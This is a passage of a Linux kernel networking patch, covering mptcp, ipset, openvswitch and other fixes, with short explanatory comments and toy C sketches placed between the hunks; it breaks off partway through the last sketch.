+ 
+ 		j1939_sk_queue_drop_all(priv, jsk, error_code);
+ 	}
+-	spin_unlock_bh(&priv->j1939_socks_lock);
++	read_unlock_bh(&priv->j1939_socks_lock);
+ }
+ 
+ static int j1939_sk_no_ioctlcmd(struct socket *sock, unsigned int cmd,
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 8a819d0a7bfb0..d4bd10f8723df 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4213,8 +4213,9 @@ struct sk_buff *skb_segment(struct sk_buff *head_skb,
+ 		/* GSO partial only requires that we trim off any excess that
+ 		 * doesn't fit into an MSS sized block, so take care of that
+ 		 * now.
++		 * Cap len to not accidentally hit GSO_BY_FRAGS.
+ 		 */
+-		partial_segs = len / mss;
++		partial_segs = min(len, GSO_BY_FRAGS - 1U) / mss;
+ 		if (partial_segs > 1)
+ 			mss *= partial_segs;
+ 		else
+diff --git a/net/hsr/hsr_device.c b/net/hsr/hsr_device.c
+index b1e86a7265b32..83906d093f0ae 100644
+--- a/net/hsr/hsr_device.c
++++ b/net/hsr/hsr_device.c
+@@ -291,7 +291,7 @@ static void send_hsr_supervision_frame(struct hsr_port *master,
+ 
+ 	skb = hsr_init_skb(master);
+ 	if (!skb) {
+-		WARN_ONCE(1, "HSR: Could not send supervision frame\n");
++		netdev_warn_once(master->dev, "HSR: Could not send supervision frame\n");
+ 		return;
+ 	}
+ 
+@@ -338,7 +338,7 @@ static void send_prp_supervision_frame(struct hsr_port *master,
+ 
+ 	skb = hsr_init_skb(master);
+ 	if (!skb) {
+-		WARN_ONCE(1, "PRP: Could not send supervision frame\n");
++		netdev_warn_once(master->dev, "PRP: Could not send supervision frame\n");
+ 		return;
+ 	}
+ 
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 2db103a56a28f..322a035f75929 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -5,7 +5,7 @@
+  * Copyright 2006-2007	Jiri Benc <jbenc@suse.cz>
+  * Copyright 2007	Johannes Berg <johannes@sipsolutions.net>
+  * Copyright 2013-2014  Intel Mobile Communications GmbH
+- * Copyright (C) 2018-2022 Intel Corporation
++ * Copyright (C) 2018-2024 Intel Corporation
+  *
+  * Transmit and frame generation functions.
+  */
+@@ -3838,6 +3838,7 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 			goto begin;
+ 
+ 		skb = __skb_dequeue(&tx.skbs);
++		info = IEEE80211_SKB_CB(skb);
+ 
+ 		if (!skb_queue_empty(&tx.skbs)) {
+ 			spin_lock_bh(&fq->lock);
+@@ -3882,7 +3883,7 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 	}
+ 
+ encap_out:
+-	IEEE80211_SKB_CB(skb)->control.vif = vif;
++	info->control.vif = vif;
+ 
+ 	if (tx.sta &&
+ 	    wiphy_ext_feature_isset(local->hw.wiphy, NL80211_EXT_FEATURE_AQL)) {
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 38cbdc66d8bff..2e1e0d0e3ec60 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -132,10 +132,21 @@ int mptcp_userspace_pm_get_flags_and_ifindex_by_id(struct mptcp_sock *msk,
+ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk,
+ 				    struct mptcp_addr_info *skc)
+ {
+-	struct mptcp_pm_addr_entry new_entry;
++	struct mptcp_pm_addr_entry *entry = NULL, *e, new_entry;
+ 	__be16 msk_sport =  ((struct inet_sock *)
+ 			     inet_sk((struct sock *)msk))->inet_sport;
+ 
++	spin_lock_bh(&msk->pm.lock);
++	list_for_each_entry(e, &msk->pm.userspace_pm_local_addr_list, list) {
++		if (mptcp_addresses_equal(&e->addr, skc, false)) {
++			entry = e;
++			break;
++		}
++	}
++	spin_unlock_bh(&msk->pm.lock);
++	if (entry)
++		return entry->addr.id;
++
+ 	memset(&new_entry, 0, sizeof(struct mptcp_pm_addr_entry));
+ 	new_entry.addr = *skc;
+ 	new_entry.addr.id = 0;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 76539d1004ebb..859b18cb8e4f6 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -1582,8 +1582,11 @@ static void mptcp_update_post_push(struct mptcp_sock *msk,
+ 
+ void mptcp_check_and_set_pending(struct sock *sk)
+ {
+-	if (mptcp_send_head(sk))
+-		mptcp_sk(sk)->push_pending |= BIT(MPTCP_PUSH_PENDING);
++	if (mptcp_send_head(sk)) {
++		mptcp_data_lock(sk);
++		mptcp_sk(sk)->cb_flags |= BIT(MPTCP_PUSH_PENDING);
++		mptcp_data_unlock(sk);
++	}
+ }
+ 
+ void __mptcp_push_pending(struct sock *sk, unsigned int flags)
+@@ -2336,9 +2339,6 @@ bool __mptcp_retransmit_pending_data(struct sock *sk)
+ 	if (__mptcp_check_fallback(mptcp_sk(sk)))
+ 		return false;
+ 
+-	if (tcp_rtx_and_write_queues_empty(sk))
+-		return false;
+-
+ 	/* the closing socket has some data untransmitted and/or unacked:
+ 	 * some data in the mptcp rtx queue has not really xmitted yet.
+ 	 * keep it simple and re-inject the whole mptcp level rtx queue
+@@ -2422,7 +2422,7 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		goto out_release;
+ 	}
+ 
+-	dispose_it = !msk->subflow || ssk != msk->subflow->sk;
++	dispose_it = msk->free_first || ssk != msk->first;
+ 	if (dispose_it)
+ 		list_del(&subflow->node);
+ 
+@@ -2440,7 +2440,6 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	need_push = (flags & MPTCP_CF_PUSH) && __mptcp_retransmit_pending_data(sk);
+ 	if (!dispose_it) {
+ 		__mptcp_subflow_disconnect(ssk, subflow, flags);
+-		msk->subflow->state = SS_UNCONNECTED;
+ 		release_sock(ssk);
+ 
+ 		goto out;
+@@ -3144,7 +3143,6 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ 	msk->last_snd = NULL;
+ 	WRITE_ONCE(msk->flags, 0);
+ 	msk->cb_flags = 0;
+-	msk->push_pending = 0;
+ 	msk->recovery = false;
+ 	msk->can_ack = false;
+ 	msk->fully_established = false;
+@@ -3341,10 +3339,10 @@ static void mptcp_destroy(struct sock *sk)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	/* clears msk->subflow, allowing the following to close
+-	 * even the initial subflow
+-	 */
+ 	mptcp_dispose_initial_subflow(msk);
++
++	/* allow the following to close even the initial subflow */
++	msk->free_first = 1;
+ 	mptcp_destroy_common(msk, 0);
+ 	sk_sockets_allocated_dec(sk);
+ }
+@@ -3388,8 +3386,7 @@ static void mptcp_release_cb(struct sock *sk)
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+ 	for (;;) {
+-		unsigned long flags = (msk->cb_flags & MPTCP_FLAGS_PROCESS_CTX_NEED) |
+-				      msk->push_pending;
++		unsigned long flags = (msk->cb_flags & MPTCP_FLAGS_PROCESS_CTX_NEED);
+ 		struct list_head join_list;
+ 
+ 		if (!flags)
+@@ -3405,7 +3402,6 @@ static void mptcp_release_cb(struct sock *sk)
+ 		 *    datapath acquires the msk socket spinlock while helding
+ 		 *    the subflow socket lock
+ 		 */
+-		msk->push_pending = 0;
+ 		msk->cb_flags &= ~flags;
+ 		spin_unlock_bh(&sk->sk_lock.slock);
+ 
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 4ec8e0a81b5a4..259672cc344f3 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -272,7 +272,6 @@ struct mptcp_sock {
+ 	int		rmem_released;
+ 	unsigned long	flags;
+ 	unsigned long	cb_flags;
+-	unsigned long	push_pending;
+ 	bool		recovery;		/* closing subflow write queue reinjected */
+ 	bool		can_ack;
+ 	bool		fully_established;
+@@ -287,7 +286,8 @@ struct mptcp_sock {
+ 			cork:1,
+ 			nodelay:1,
+ 			fastopening:1,
+-			in_accept_queue:1;
++			in_accept_queue:1,
++			free_first:1;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+ 	struct rb_root  out_of_order_queue;
+diff --git a/net/netfilter/ipset/ip_set_bitmap_gen.h b/net/netfilter/ipset/ip_set_bitmap_gen.h
+index 26ab0e9612d82..9523104a90da4 100644
+--- a/net/netfilter/ipset/ip_set_bitmap_gen.h
++++ b/net/netfilter/ipset/ip_set_bitmap_gen.h
+@@ -28,6 +28,7 @@
+ #define mtype_del		IPSET_TOKEN(MTYPE, _del)
+ #define mtype_list		IPSET_TOKEN(MTYPE, _list)
+ #define mtype_gc		IPSET_TOKEN(MTYPE, _gc)
++#define mtype_cancel_gc		IPSET_TOKEN(MTYPE, _cancel_gc)
+ #define mtype			MTYPE
+ 
+ #define get_ext(set, map, id)	((map)->extensions + ((set)->dsize * (id)))
+@@ -57,9 +58,6 @@ mtype_destroy(struct ip_set *set)
+ {
+ 	struct mtype *map = set->data;
+ 
+-	if (SET_WITH_TIMEOUT(set))
+-		del_timer_sync(&map->gc);
+-
+ 	if (set->dsize && set->extensions & IPSET_EXT_DESTROY)
+ 		mtype_ext_cleanup(set);
+ 	ip_set_free(map->members);
+@@ -288,6 +286,15 @@ mtype_gc(struct timer_list *t)
+ 	add_timer(&map->gc);
+ }
+ 
++static void
++mtype_cancel_gc(struct ip_set *set)
++{
++	struct mtype *map = set->data;
++
++	if (SET_WITH_TIMEOUT(set))
++		del_timer_sync(&map->gc);
++}
++
+ static const struct ip_set_type_variant mtype = {
+ 	.kadt	= mtype_kadt,
+ 	.uadt	= mtype_uadt,
+@@ -301,6 +308,7 @@ static const struct ip_set_type_variant mtype = {
+ 	.head	= mtype_head,
+ 	.list	= mtype_list,
+ 	.same_set = mtype_same_set,
++	.cancel_gc = mtype_cancel_gc,
+ };
+ 
+ #endif /* __IP_SET_BITMAP_IP_GEN_H */
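
This hunk, together with the matching ones for the hash and list:set
variants further down, splits garbage-collector cancellation out of
->destroy() into a new ->cancel_gc() method, so the core can stop the
timer separately from (and before) freeing the set. A toy ops-table
sketch of the split, with invented names:

    #include <stdio.h>
    #include <stdbool.h>

    struct set;

    struct set_variant {
        void (*destroy)(struct set *set);
        void (*cancel_gc)(struct set *set);
    };

    struct set {
        const struct set_variant *variant;
        bool gc_armed;
    };

    static void my_destroy(struct set *set)
    {
        (void)set;
        /* frees memory only; no timer handling here any more */
        printf("destroy: freeing members\n");
    }

    static void my_cancel_gc(struct set *set)
    {
        if (set->gc_armed) {              /* mirrors SET_WITH_TIMEOUT() */
            set->gc_armed = false;
            printf("cancel_gc: timer stopped\n");
        }
    }

    static const struct set_variant variant = {
        .destroy   = my_destroy,
        .cancel_gc = my_cancel_gc,
    };

    int main(void)
    {
        struct set s = { .variant = &variant, .gc_armed = true };

        /* the core now always stops the gc before destroying the set */
        s.variant->cancel_gc(&s);
        s.variant->destroy(&s);
        return 0;
    }
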
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index d47dfdcb899b0..f645da82d826e 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -1156,6 +1156,7 @@ static int ip_set_create(struct sk_buff *skb, const struct nfnl_info *info,
+ 	return ret;
+ 
+ cleanup:
++	set->variant->cancel_gc(set);
+ 	set->variant->destroy(set);
+ put_out:
+ 	module_put(set->type->me);
+@@ -1184,6 +1185,14 @@ ip_set_destroy_set(struct ip_set *set)
+ 	kfree(set);
+ }
+ 
++static void
++ip_set_destroy_set_rcu(struct rcu_head *head)
++{
++	struct ip_set *set = container_of(head, struct ip_set, rcu);
++
++	ip_set_destroy_set(set);
++}
++
+ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 			  const struct nlattr * const attr[])
+ {
+@@ -1195,8 +1204,6 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 	if (unlikely(protocol_min_failed(attr)))
+ 		return -IPSET_ERR_PROTOCOL;
+ 
+-	/* Must wait for flush to be really finished in list:set */
+-	rcu_barrier();
+ 
+ 	/* Commands are serialized and references are
+ 	 * protected by the ip_set_ref_lock.
+@@ -1208,8 +1215,10 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 	 * counter, so if it's already zero, we can proceed
+ 	 * without holding the lock.
+ 	 */
+-	read_lock_bh(&ip_set_ref_lock);
+ 	if (!attr[IPSET_ATTR_SETNAME]) {
++		/* Must wait for flush to be really finished in list:set */
++		rcu_barrier();
++		read_lock_bh(&ip_set_ref_lock);
+ 		for (i = 0; i < inst->ip_set_max; i++) {
+ 			s = ip_set(inst, i);
+ 			if (s && (s->ref || s->ref_netlink)) {
+@@ -1223,6 +1232,8 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 			s = ip_set(inst, i);
+ 			if (s) {
+ 				ip_set(inst, i) = NULL;
++				/* Must cancel garbage collectors */
++				s->variant->cancel_gc(s);
+ 				ip_set_destroy_set(s);
+ 			}
+ 		}
+@@ -1230,6 +1241,9 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 		inst->is_destroyed = false;
+ 	} else {
+ 		u32 flags = flag_exist(info->nlh);
++		u16 features = 0;
++
++		read_lock_bh(&ip_set_ref_lock);
+ 		s = find_set_and_id(inst, nla_data(attr[IPSET_ATTR_SETNAME]),
+ 				    &i);
+ 		if (!s) {
+@@ -1240,10 +1254,16 @@ static int ip_set_destroy(struct sk_buff *skb, const struct nfnl_info *info,
+ 			ret = -IPSET_ERR_BUSY;
+ 			goto out;
+ 		}
++		features = s->type->features;
+ 		ip_set(inst, i) = NULL;
+ 		read_unlock_bh(&ip_set_ref_lock);
+-
+-		ip_set_destroy_set(s);
++		if (features & IPSET_TYPE_NAME) {
++			/* Must wait for flush to be really finished  */
++			rcu_barrier();
++		}
++		/* Must cancel garbage collectors */
++		s->variant->cancel_gc(s);
++		call_rcu(&s->rcu, ip_set_destroy_set_rcu);
+ 	}
+ 	return 0;
+ out:
+@@ -1396,9 +1416,6 @@ static int ip_set_swap(struct sk_buff *skb, const struct nfnl_info *info,
+ 	ip_set(inst, to_id) = from;
+ 	write_unlock_bh(&ip_set_ref_lock);
+ 
+-	/* Make sure all readers of the old set pointers are completed. */
+-	synchronize_rcu();
+-
+ 	return 0;
+ }
+ 
+@@ -2364,6 +2381,7 @@ ip_set_net_exit(struct net *net)
+ 		set = ip_set(inst, i);
+ 		if (set) {
+ 			ip_set(inst, i) = NULL;
++			set->variant->cancel_gc(set);
+ 			ip_set_destroy_set(set);
+ 		}
+ 	}
+@@ -2411,8 +2429,11 @@ ip_set_fini(void)
+ {
+ 	nf_unregister_sockopt(&so_set);
+ 	nfnetlink_subsys_unregister(&ip_set_netlink_subsys);
+-
+ 	unregister_pernet_subsys(&ip_set_net_ops);
++
++	/* Wait for call_rcu() in destroy */
++	rcu_barrier();
++
+ 	pr_debug("these are the famous last words\n");
+ }
+ 
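
ip_set_destroy() now cancels the set's garbage collector and defers the
actual free through call_rcu(); the callback recovers the set from the
rcu head embedded in struct ip_set via container_of(), and ip_set_fini()
gains an rcu_barrier() so pending callbacks drain before module unload.
A userspace sketch of the embedded-callback-head shape; note that
fake_call_rcu() below invokes the callback immediately, whereas the real
call_rcu() runs it only after a grace period:

    #include <stdio.h>
    #include <stdlib.h>
    #include <stddef.h>

    struct cb_head {
        void (*func)(struct cb_head *head);
    };

    #define container_of(ptr, type, member) \
        ((type *)((char *)(ptr) - offsetof(type, member)))

    struct ip_set {
        char name[16];
        struct cb_head rcu;     /* embedded head, as in struct ip_set */
    };

    static void set_destroy_cb(struct cb_head *head)
    {
        struct ip_set *set = container_of(head, struct ip_set, rcu);

        printf("freeing set %s after grace period\n", set->name);
        free(set);
    }

    /* stand-in for call_rcu(): invokes right away for demonstration */
    static void fake_call_rcu(struct cb_head *head,
                              void (*func)(struct cb_head *))
    {
        head->func = func;
        head->func(head);
    }

    int main(void)
    {
        struct ip_set *s = calloc(1, sizeof(*s));

        if (!s)
            return 1;
        snprintf(s->name, sizeof(s->name), "test");
        fake_call_rcu(&s->rcu, set_destroy_cb);
        return 0;
    }
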
+diff --git a/net/netfilter/ipset/ip_set_hash_gen.h b/net/netfilter/ipset/ip_set_hash_gen.h
+index 7499192af5866..ef04e556aadb4 100644
+--- a/net/netfilter/ipset/ip_set_hash_gen.h
++++ b/net/netfilter/ipset/ip_set_hash_gen.h
+@@ -210,6 +210,7 @@ htable_size(u8 hbits)
+ #undef mtype_gc_do
+ #undef mtype_gc
+ #undef mtype_gc_init
++#undef mtype_cancel_gc
+ #undef mtype_variant
+ #undef mtype_data_match
+ 
+@@ -254,6 +255,7 @@ htable_size(u8 hbits)
+ #define mtype_gc_do		IPSET_TOKEN(MTYPE, _gc_do)
+ #define mtype_gc		IPSET_TOKEN(MTYPE, _gc)
+ #define mtype_gc_init		IPSET_TOKEN(MTYPE, _gc_init)
++#define mtype_cancel_gc		IPSET_TOKEN(MTYPE, _cancel_gc)
+ #define mtype_variant		IPSET_TOKEN(MTYPE, _variant)
+ #define mtype_data_match	IPSET_TOKEN(MTYPE, _data_match)
+ 
+@@ -417,7 +419,7 @@ mtype_ahash_destroy(struct ip_set *set, struct htable *t, bool ext_destroy)
+ 	u32 i;
+ 
+ 	for (i = 0; i < jhash_size(t->htable_bits); i++) {
+-		n = __ipset_dereference(hbucket(t, i));
++		n = (__force struct hbucket *)hbucket(t, i);
+ 		if (!n)
+ 			continue;
+ 		if (set->extensions & IPSET_EXT_DESTROY && ext_destroy)
+@@ -437,10 +439,7 @@ mtype_destroy(struct ip_set *set)
+ 	struct htype *h = set->data;
+ 	struct list_head *l, *lt;
+ 
+-	if (SET_WITH_TIMEOUT(set))
+-		cancel_delayed_work_sync(&h->gc.dwork);
+-
+-	mtype_ahash_destroy(set, ipset_dereference_nfnl(h->table), true);
++	mtype_ahash_destroy(set, (__force struct htable *)h->table, true);
+ 	list_for_each_safe(l, lt, &h->ad) {
+ 		list_del(l);
+ 		kfree(l);
+@@ -586,6 +585,15 @@ mtype_gc_init(struct htable_gc *gc)
+ 	queue_delayed_work(system_power_efficient_wq, &gc->dwork, HZ);
+ }
+ 
++static void
++mtype_cancel_gc(struct ip_set *set)
++{
++	struct htype *h = set->data;
++
++	if (SET_WITH_TIMEOUT(set))
++		cancel_delayed_work_sync(&h->gc.dwork);
++}
++
+ static int
+ mtype_add(struct ip_set *set, void *value, const struct ip_set_ext *ext,
+ 	  struct ip_set_ext *mext, u32 flags);
+@@ -1416,6 +1424,7 @@ static const struct ip_set_type_variant mtype_variant = {
+ 	.uref	= mtype_uref,
+ 	.resize	= mtype_resize,
+ 	.same_set = mtype_same_set,
++	.cancel_gc = mtype_cancel_gc,
+ 	.region_lock = true,
+ };
+ 
+diff --git a/net/netfilter/ipset/ip_set_list_set.c b/net/netfilter/ipset/ip_set_list_set.c
+index 5a67f79665742..6bc7019982b05 100644
+--- a/net/netfilter/ipset/ip_set_list_set.c
++++ b/net/netfilter/ipset/ip_set_list_set.c
+@@ -426,9 +426,6 @@ list_set_destroy(struct ip_set *set)
+ 	struct list_set *map = set->data;
+ 	struct set_elem *e, *n;
+ 
+-	if (SET_WITH_TIMEOUT(set))
+-		del_timer_sync(&map->gc);
+-
+ 	list_for_each_entry_safe(e, n, &map->members, list) {
+ 		list_del(&e->list);
+ 		ip_set_put_byindex(map->net, e->id);
+@@ -545,6 +542,15 @@ list_set_same_set(const struct ip_set *a, const struct ip_set *b)
+ 	       a->extensions == b->extensions;
+ }
+ 
++static void
++list_set_cancel_gc(struct ip_set *set)
++{
++	struct list_set *map = set->data;
++
++	if (SET_WITH_TIMEOUT(set))
++		del_timer_sync(&map->gc);
++}
++
+ static const struct ip_set_type_variant set_variant = {
+ 	.kadt	= list_set_kadt,
+ 	.uadt	= list_set_uadt,
+@@ -558,6 +564,7 @@ static const struct ip_set_type_variant set_variant = {
+ 	.head	= list_set_head,
+ 	.list	= list_set_list,
+ 	.same_set = list_set_same_set,
++	.cancel_gc = list_set_cancel_gc,
+ };
+ 
+ static void
+diff --git a/net/netfilter/nft_set_pipapo_avx2.c b/net/netfilter/nft_set_pipapo_avx2.c
+index 90e275bb3e5d7..a3a8ddca99189 100644
+--- a/net/netfilter/nft_set_pipapo_avx2.c
++++ b/net/netfilter/nft_set_pipapo_avx2.c
+@@ -57,7 +57,7 @@
+ 
+ /* Jump to label if @reg is zero */
+ #define NFT_PIPAPO_AVX2_NOMATCH_GOTO(reg, label)			\
+-	asm_volatile_goto("vptest %%ymm" #reg ", %%ymm" #reg ";"	\
++	asm goto("vptest %%ymm" #reg ", %%ymm" #reg ";"	\
+ 			  "je %l[" #label "]" : : : : label)
+ 
+ /* Store 256 bits from YMM register into memory. Contrary to bucket load
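
The only change in this hunk is spelling: asm_volatile_goto() existed to
work around old GCC bugs and is retired upstream in favour of plain
asm goto (the same rename shows up in samples/bpf and tools/ below).
For reference, a free-standing x86 example of the construct, which needs
GCC or Clang; the asm can jump directly to a C label passed after the
fourth colon:

    #include <stdio.h>

    static int is_zero(unsigned long v)
    {
        asm goto("test %0, %0; jz %l[was_zero]"
                 : /* no outputs */ : "r" (v) : "cc" : was_zero);
        return 0;
    was_zero:
        return 1;
    }

    int main(void)
    {
        printf("%d %d\n", is_zero(0), is_zero(42));   /* prints 1 0 */
        return 0;
    }
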
+diff --git a/net/nfc/nci/core.c b/net/nfc/nci/core.c
+index 7535afd1537e9..b5071a2f597d4 100644
+--- a/net/nfc/nci/core.c
++++ b/net/nfc/nci/core.c
+@@ -1207,6 +1207,10 @@ void nci_free_device(struct nci_dev *ndev)
+ {
+ 	nfc_free_device(ndev->nfc_dev);
+ 	nci_hci_deallocate(ndev);
++
++	/* drop partial rx data packet if present */
++	if (ndev->rx_data_reassembly)
++		kfree_skb(ndev->rx_data_reassembly);
+ 	kfree(ndev);
+ }
+ EXPORT_SYMBOL(nci_free_device);
+diff --git a/net/openvswitch/flow_netlink.c b/net/openvswitch/flow_netlink.c
+index ead5418c126e3..e3c85ceb1f0a5 100644
+--- a/net/openvswitch/flow_netlink.c
++++ b/net/openvswitch/flow_netlink.c
+@@ -47,6 +47,7 @@ struct ovs_len_tbl {
+ 
+ #define OVS_ATTR_NESTED -1
+ #define OVS_ATTR_VARIABLE -2
++#define OVS_COPY_ACTIONS_MAX_DEPTH 16
+ 
+ static bool actions_may_change_flow(const struct nlattr *actions)
+ {
+@@ -2543,13 +2544,15 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 				  const struct sw_flow_key *key,
+ 				  struct sw_flow_actions **sfa,
+ 				  __be16 eth_type, __be16 vlan_tci,
+-				  u32 mpls_label_count, bool log);
++				  u32 mpls_label_count, bool log,
++				  u32 depth);
+ 
+ static int validate_and_copy_sample(struct net *net, const struct nlattr *attr,
+ 				    const struct sw_flow_key *key,
+ 				    struct sw_flow_actions **sfa,
+ 				    __be16 eth_type, __be16 vlan_tci,
+-				    u32 mpls_label_count, bool log, bool last)
++				    u32 mpls_label_count, bool log, bool last,
++				    u32 depth)
+ {
+ 	const struct nlattr *attrs[OVS_SAMPLE_ATTR_MAX + 1];
+ 	const struct nlattr *probability, *actions;
+@@ -2600,7 +2603,8 @@ static int validate_and_copy_sample(struct net *net, const struct nlattr *attr,
+ 		return err;
+ 
+ 	err = __ovs_nla_copy_actions(net, actions, key, sfa,
+-				     eth_type, vlan_tci, mpls_label_count, log);
++				     eth_type, vlan_tci, mpls_label_count, log,
++				     depth + 1);
+ 
+ 	if (err)
+ 		return err;
+@@ -2615,7 +2619,8 @@ static int validate_and_copy_dec_ttl(struct net *net,
+ 				     const struct sw_flow_key *key,
+ 				     struct sw_flow_actions **sfa,
+ 				     __be16 eth_type, __be16 vlan_tci,
+-				     u32 mpls_label_count, bool log)
++				     u32 mpls_label_count, bool log,
++				     u32 depth)
+ {
+ 	const struct nlattr *attrs[OVS_DEC_TTL_ATTR_MAX + 1];
+ 	int start, action_start, err, rem;
+@@ -2658,7 +2663,8 @@ static int validate_and_copy_dec_ttl(struct net *net,
+ 		return action_start;
+ 
+ 	err = __ovs_nla_copy_actions(net, actions, key, sfa, eth_type,
+-				     vlan_tci, mpls_label_count, log);
++				     vlan_tci, mpls_label_count, log,
++				     depth + 1);
+ 	if (err)
+ 		return err;
+ 
+@@ -2672,7 +2678,8 @@ static int validate_and_copy_clone(struct net *net,
+ 				   const struct sw_flow_key *key,
+ 				   struct sw_flow_actions **sfa,
+ 				   __be16 eth_type, __be16 vlan_tci,
+-				   u32 mpls_label_count, bool log, bool last)
++				   u32 mpls_label_count, bool log, bool last,
++				   u32 depth)
+ {
+ 	int start, err;
+ 	u32 exec;
+@@ -2692,7 +2699,8 @@ static int validate_and_copy_clone(struct net *net,
+ 		return err;
+ 
+ 	err = __ovs_nla_copy_actions(net, attr, key, sfa,
+-				     eth_type, vlan_tci, mpls_label_count, log);
++				     eth_type, vlan_tci, mpls_label_count, log,
++				     depth + 1);
+ 	if (err)
+ 		return err;
+ 
+@@ -3061,7 +3069,7 @@ static int validate_and_copy_check_pkt_len(struct net *net,
+ 					   struct sw_flow_actions **sfa,
+ 					   __be16 eth_type, __be16 vlan_tci,
+ 					   u32 mpls_label_count,
+-					   bool log, bool last)
++					   bool log, bool last, u32 depth)
+ {
+ 	const struct nlattr *acts_if_greater, *acts_if_lesser_eq;
+ 	struct nlattr *a[OVS_CHECK_PKT_LEN_ATTR_MAX + 1];
+@@ -3109,7 +3117,8 @@ static int validate_and_copy_check_pkt_len(struct net *net,
+ 		return nested_acts_start;
+ 
+ 	err = __ovs_nla_copy_actions(net, acts_if_lesser_eq, key, sfa,
+-				     eth_type, vlan_tci, mpls_label_count, log);
++				     eth_type, vlan_tci, mpls_label_count, log,
++				     depth + 1);
+ 
+ 	if (err)
+ 		return err;
+@@ -3122,7 +3131,8 @@ static int validate_and_copy_check_pkt_len(struct net *net,
+ 		return nested_acts_start;
+ 
+ 	err = __ovs_nla_copy_actions(net, acts_if_greater, key, sfa,
+-				     eth_type, vlan_tci, mpls_label_count, log);
++				     eth_type, vlan_tci, mpls_label_count, log,
++				     depth + 1);
+ 
+ 	if (err)
+ 		return err;
+@@ -3150,12 +3160,16 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 				  const struct sw_flow_key *key,
+ 				  struct sw_flow_actions **sfa,
+ 				  __be16 eth_type, __be16 vlan_tci,
+-				  u32 mpls_label_count, bool log)
++				  u32 mpls_label_count, bool log,
++				  u32 depth)
+ {
+ 	u8 mac_proto = ovs_key_mac_proto(key);
+ 	const struct nlattr *a;
+ 	int rem, err;
+ 
++	if (depth > OVS_COPY_ACTIONS_MAX_DEPTH)
++		return -EOVERFLOW;
++
+ 	nla_for_each_nested(a, attr, rem) {
+ 		/* Expected argument lengths, (u32)-1 for variable length. */
+ 		static const u32 action_lens[OVS_ACTION_ATTR_MAX + 1] = {
+@@ -3350,7 +3364,7 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 			err = validate_and_copy_sample(net, a, key, sfa,
+ 						       eth_type, vlan_tci,
+ 						       mpls_label_count,
+-						       log, last);
++						       log, last, depth);
+ 			if (err)
+ 				return err;
+ 			skip_copy = true;
+@@ -3421,7 +3435,7 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 			err = validate_and_copy_clone(net, a, key, sfa,
+ 						      eth_type, vlan_tci,
+ 						      mpls_label_count,
+-						      log, last);
++						      log, last, depth);
+ 			if (err)
+ 				return err;
+ 			skip_copy = true;
+@@ -3435,7 +3449,8 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 							      eth_type,
+ 							      vlan_tci,
+ 							      mpls_label_count,
+-							      log, last);
++							      log, last,
++							      depth);
+ 			if (err)
+ 				return err;
+ 			skip_copy = true;
+@@ -3445,7 +3460,8 @@ static int __ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 		case OVS_ACTION_ATTR_DEC_TTL:
+ 			err = validate_and_copy_dec_ttl(net, a, key, sfa,
+ 							eth_type, vlan_tci,
+-							mpls_label_count, log);
++							mpls_label_count, log,
++							depth);
+ 			if (err)
+ 				return err;
+ 			skip_copy = true;
+@@ -3485,7 +3501,8 @@ int ovs_nla_copy_actions(struct net *net, const struct nlattr *attr,
+ 
+ 	(*sfa)->orig_len = nla_len(attr);
+ 	err = __ovs_nla_copy_actions(net, attr, key, sfa, key->eth.type,
+-				     key->eth.vlan.tci, mpls_label_count, log);
++				     key->eth.vlan.tci, mpls_label_count, log,
++				     0);
+ 	if (err)
+ 		ovs_nla_free_flow_actions(*sfa);
+ 
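
The openvswitch fix threads an explicit depth argument through
__ovs_nla_copy_actions() and every helper that recurses back into it,
refusing to go past OVS_COPY_ACTIONS_MAX_DEPTH, so a maliciously nested
action list from userspace can no longer exhaust the kernel stack. A
self-contained sketch of the same guard (struct and function names are
made up):

    #include <stdio.h>
    #include <errno.h>

    #define COPY_ACTIONS_MAX_DEPTH 16

    struct action {
        struct action *next;    /* sibling in the same list */
        struct action *nested;  /* e.g. sample/clone/check_pkt_len body */
    };

    static int copy_actions(const struct action *a, unsigned int depth)
    {
        if (depth > COPY_ACTIONS_MAX_DEPTH)
            return -EOVERFLOW;          /* same errno as the patch */

        for (; a; a = a->next) {
            if (a->nested) {
                int err = copy_actions(a->nested, depth + 1);

                if (err)
                    return err;
            }
        }
        return 0;
    }

    int main(void)
    {
        struct action chain[64] = { { 0 } };
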